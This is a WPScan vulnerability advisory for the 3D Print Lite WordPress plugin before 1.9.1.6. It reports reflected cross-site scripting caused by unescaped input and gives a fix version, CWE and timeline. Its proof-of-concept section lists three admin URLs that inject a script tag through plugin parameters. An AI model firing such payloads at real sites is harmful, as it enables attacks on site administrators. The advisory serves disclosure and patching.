logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

3D Print Lite < 1.9.1.6 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape some user input before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/admin.php?page=p3dlite_materials&material_text="><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=p3dlite_printers&printer_text="><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=p3dlite_coatings&coating_text="><script>alert(/XSS/)</script> (< 1.9.1.5)

Affects Plugins

3dprint-lite

Fixed in version 1.9.1.6

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

5909e225-5756-472e-a2fc-3ac52c7fb909

Timeline

Publicly Published

2021-10-11 (about 3 months ago)

Added

2021-10-11 (about 3 months ago)

Last Updated

2021-10-11 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin